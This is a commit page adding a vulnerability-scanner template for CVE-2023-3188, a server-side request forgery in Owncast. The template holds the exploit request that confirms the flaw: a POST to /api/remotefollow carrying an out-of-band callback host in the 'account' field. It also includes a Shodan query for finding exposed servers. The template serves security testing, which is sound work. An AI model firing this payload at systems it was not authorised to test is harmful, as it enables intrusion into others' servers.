Create CVE-2023-3188.yaml
parent
d6cc030922
commit
b29c0b4f98
|
@ -0,0 +1,50 @@
|
||||||
|
id: CVE-2023-3188
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Owncast Server Side Request Forgery
|
||||||
|
author: DhiyaneshDk
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Server-Side Request Forgery (SSRF) in GitHub repository owncast/owncast prior to 0.1.0.
|
||||||
|
reference:
|
||||||
|
- https://owncast.online/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.5
|
||||||
|
cve-id: CVE-2023-3188
|
||||||
|
cwe-id: CWE-918
|
||||||
|
epss-score: 0.00098
|
||||||
|
epss-percentile: 0.41558
|
||||||
|
cpe: cpe:2.3:a:owncast_project:owncast:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: owncast_project
|
||||||
|
product: owncast
|
||||||
|
shodan-query: html:"owncast"
|
||||||
|
tags: cve,cve2023,owncast,oast,ssrf
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /api/remotefollow HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
{"account":"a@{{interactsh-url}}"}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "success"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: content_type
|
||||||
|
words:
|
||||||
|
- "application/json"
|
Loading…
Reference in New Issue